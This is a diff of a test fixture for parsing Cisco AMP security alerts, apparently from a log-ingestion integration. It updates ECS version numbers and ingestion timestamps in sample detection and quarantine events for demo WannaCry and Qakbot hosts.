                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -183,7 +183,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -203,7 +203,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500130418Z",
+                "ingested": "2021-09-13T18:07:28.111137209Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -260,7 +260,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -290,7 +290,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500132533Z",
+                "ingested": "2021-09-13T18:07:28.111139358Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -356,7 +356,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -388,7 +388,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500134723Z",
+                "ingested": "2021-09-13T18:07:28.111141503Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -458,7 +458,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -490,7 +490,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500136852Z",
+                "ingested": "2021-09-13T18:07:28.111143609Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -547,7 +547,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -567,7 +567,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500138978Z",
+                "ingested": "2021-09-13T18:07:28.111145703Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -618,7 +618,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -638,7 +638,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500141093Z",
+                "ingested": "2021-09-13T18:07:28.111147798Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -697,7 +697,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -729,7 +729,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500143175Z",
+                "ingested": "2021-09-13T18:07:28.111149933Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -786,7 +786,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -818,7 +818,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500145233Z",
+                "ingested": "2021-09-13T18:07:28.111152028Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -871,7 +871,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -891,7 +891,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500147317Z",
+                "ingested": "2021-09-13T18:07:28.111154118Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -942,7 +942,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -962,7 +962,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500149522Z",
+                "ingested": "2021-09-13T18:07:28.111156357Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1017,7 +1017,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1037,7 +1037,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500151606Z",
+                "ingested": "2021-09-13T18:07:28.111158472Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1092,7 +1092,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1112,7 +1112,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500153674Z",
+                "ingested": "2021-09-13T18:07:28.111160543Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -1167,7 +1167,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1187,7 +1187,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500155748Z",
+                "ingested": "2021-09-13T18:07:28.111162637Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -1240,7 +1240,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1264,7 +1264,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500157824Z",
+                "ingested": "2021-09-13T18:07:28.111164728Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -1321,7 +1321,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1347,7 +1347,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500160068Z",
+                "ingested": "2021-09-13T18:07:28.111166874Z",
